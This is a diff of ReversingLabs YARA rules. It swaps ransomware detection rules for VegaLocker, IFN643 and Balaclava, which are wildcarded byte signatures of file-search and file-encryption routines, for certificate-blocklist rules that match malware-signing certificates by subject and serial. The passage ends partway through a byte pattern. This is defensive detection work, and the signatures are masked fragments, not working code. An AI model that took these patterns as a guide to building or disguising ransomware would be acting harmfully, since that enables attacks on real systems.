-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.VegaLocker.yara#L1-L100"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16396-L16414"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8616e72fc435676179e83a304d4111c8f29ebf3cd79ff5b2d229cca8fc97c2a3"
+		logic_hash = "5c4afcd8ceb5cc2f1df2303183ede2081b86365eeee7d4e1319a8ed9a45bbf0b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "VegaLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74
-            ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
-            ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ??
-            ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84
-            ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6
-            03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03
-            C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3
-            48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
-            ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8D 45 ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85
-            ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68
-            ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
-            45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            33 D2 8B 45 ?? 8B 08 FF 51 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B
-            45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C6
-            85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59
-            64 89 10 EB ?? E9 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
-        }
-		$encrypt_files_p2 = {
-            64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95
-            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ??
-            0F 8E ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB
-            ?? 7E ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 8D 45 ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
-            ?? 8D 45 ?? E8 ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ??
-            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA
-        }
-		$encrypt_files_p3 = {
-            E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            EB ?? 8D 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B
-            08 FF 51 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ??
-            E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ??
-            ?? ?? 59 EB ?? 55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE COMPANY OF WORDS LTD" and ( pe.signatures [ i ] . serial == "00:c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31" or pe.signatures [ i ] . serial == "c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31" ) and 1549324800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_IFN643 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Ede6Cfbf9Fa18337B0Fdb49C1F693020 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects IFN643 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a4d211a7-6735-541e-885d-555bbc11e2cf"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "0389d5ba-4535-5277-9c77-bd178e66417f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.IFN643.yara#L1-L90"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16416-L16434"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ced234018f1f05601dd3be55eaecd2a1e116ad0b7bb9e0292434f11f19916ebe"
+		logic_hash = "a7f18d0028cbc0001a196bc915b7881244a5833dd65f96dd7d2e8ab1b0622e0c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "IFN643"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files_1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B D6 C7 45 ?? ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8
-            ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ??
-            83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 8D ??
-            ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB
-            ?? 0F 84
-        }
-		$search_files_2 = {
-            80 BD ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 75 ?? 33
-            C0 EB ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 85 ?? ?? ?? ??
-            50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7
-            E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 4D ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ??
-            ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ??
-            ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ??
-            0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ??
-            8B 35 ?? ?? ?? ?? 33 DB 2B CE C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F7 E9 C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C1 FA ?? 8B C2 C6 85 ?? ?? ?? ?? ?? C1 E8 ?? 03 C2 74 ?? 33 FF ?? ?? ??
-            8D 45 ?? 8D 0C 37 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 89 45 ?? 8D 45 ?? 0F 43
-            45 ?? C6 00 ?? 8B 35 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B CE 43 F7 E9 83
-            C7 ?? C1 FA ?? 8B C2 C1 E8 ?? 03 C2 3B D8 72 ?? 83 7D ?? ?? 76 ?? 8D 45 ?? B9 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7 E9 C1
-            FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ??
-            72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F
-            83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ??
-            ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83
-            F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
-            45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ??
-            8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76
-            ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1
-            ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8
-            ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ??
-            83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41
-            ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8
-            ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
-            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B C2 89 45 ?? 8B F9 8B 75 ?? 89 75 ??
-            C7 45 ?? ?? ?? ?? ?? 90 3B F8 0F 84 ?? ?? ?? ?? 89 75 ?? C6 45 ?? ?? 85 F6 74 ?? 8B
-            17 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46
-            ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ?? 8B C6 C6 00 ?? 80 3A ?? 75 ?? 33 C0 EB ?? 8B C2 8D
-            58 ?? 66 90 8A 08 40 84 C9 75 ?? 2B C3 50 52 8B CE E8 ?? ?? ?? ?? 8B 45 ?? 83 C6 ??
-            C6 45 ?? ?? 89 75 ?? 83 C7 ?? EB ?? 8B 55 ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 6A ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
-            2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9
-            ?? ?? ?? ?? 33 C0 57 8B F9 40 F0 0F C1 05 ?? ?? ?? ?? 75 ?? 56 BE ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 83 C6 ?? 59 81 FE ?? ?? ?? ?? 7C ?? 5E 8B C7 5F C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_files_1 and $search_files_2 and $encrypt_files
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "START ARCHITECTURE LTD" and ( pe.signatures [ i ] . serial == "00:ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" or pe.signatures [ i ] . serial == "ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" ) and 1554940800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Balaclava : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Balaclava ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1a17f2e8-f161-55bc-b44e-f8f47ebd9869"
-		date = "2020-10-01"
-		modified = "2020-10-01"
+		id = "308a73cd-a142-56ad-8dca-808ab455b43e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Balaclava.yara#L1-L113"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16436-L16454"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "01b43e6ea7ceebdbdda7e1f7c5bd2439a460b8aed4a1837755fa3679e9893ff3"
+		logic_hash = "af3cd543a6feec3118ba4e5fdc8455584aa763bd8339f036ab332977fc0fb20e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Balaclava"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 83 EC ?? 53 56 8B 75 ?? 33 D2 57 6A ?? 5B 8B 7E ?? 89 55 ?? 8D 4F ?? 66 8B
-            07 03 FB 66 3B C2 75 ?? 2B F9 B9 ?? ?? ?? ?? D1 FF E8 ?? ?? ?? ?? 50 FF 76 ?? 89 45
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
-            45 ?? 83 C0 ?? 89 45 ?? 8B D8 33 D2 8D 4B ?? 66 8B 03 83 C3 ?? 66 3B C2 75 ?? 2B D9
-            D1 FB 8D 04 3B 3D ?? ?? ?? ?? 7C ?? 8D 04 45 ?? ?? ?? ?? 50 39 56 ?? 74 ?? FF 76 ??
-            52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? 39 46 ?? 74 ?? 89 46 ?? 8B 46 ?? 33 C9 66 89 0C 78 8B 55 ?? F7 02 ?? ?? ?? ??
-            0F 85 ?? ?? ?? ?? 33 D2 8B C2 6A ?? 89 45 ?? 59 89 4D ?? 3B C1 7F ?? 03 C1 8B 4D ??
-            99 2B C2 D1 F8 89 45 ?? 8B 14 85 ?? ?? ?? ?? 66 8B 01 66 3B 02 75 ?? 66 85 C0 74 ??
-            66 8B 41 ?? 66 3B 42 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 D2 8B C2 EB ?? 1B
-            C0 83 C8 ?? 33 D2 85 C0 0F 84 ?? ?? ?? ?? 79 ?? 8B 4D ?? 8B 45 ?? 49 EB ?? 8B 45 ??
-            8B 4D ?? 40 89 45 ?? EB ?? 8B 45 ?? F6 00 ?? 0F 84 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ??
-            50 8B 46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? 8B 46 ??
-            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 74
-            ?? 83 7E ?? ?? 7E ?? FF 76 ?? 8B 4E ?? FF 76 ?? E8 ?? ?? ?? ?? 59 59 8B 4E ?? 8D 14
-        }
-		$find_files_p2 = {
-            3B A1 ?? ?? ?? ?? 56 89 44 51 ?? 66 A1 ?? ?? ?? ?? 66 89 44 51 ?? FF 46 ?? E8 ?? ??
-            ?? ?? FF 4E ?? E9 ?? ?? ?? ?? 39 56 ?? 0F 85 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ?? 50 8B
-            46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 5E ?? 83 C4 ?? 8B CB B8 ?? ??
-            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
-            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B CB 8D
-            51 ?? 66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 F9 ?? 72 ?? 8B CB 8D 51 ??
-            66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 C1 ?? 68 ?? ?? ?? ?? 8D 04 4B 50
-            FF 15 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 A8 ?? 74 ?? 83 E0 ??
-            50 FF 76 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? EB ?? 85 C0 75 ?? 6A ?? 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ??
-            ?? ?? ?? 6A ?? 58 3B C8 A1 ?? ?? ?? ?? 74 ?? 83 F8 ?? 74 ?? FF 76 ?? A1 ?? ?? ?? ??
-            33 D2 6A ?? 03 C1 59 F7 F1 FF 34 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 05 ?? ?? ?? ??
-            FF 05 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 6A
-            ?? 59 66 89 4C 78 ?? 33 C9 8B 46 ?? 66 89 0C 78 FF 75 ?? 8B 5D ?? 53 FF 15 ?? ?? ??
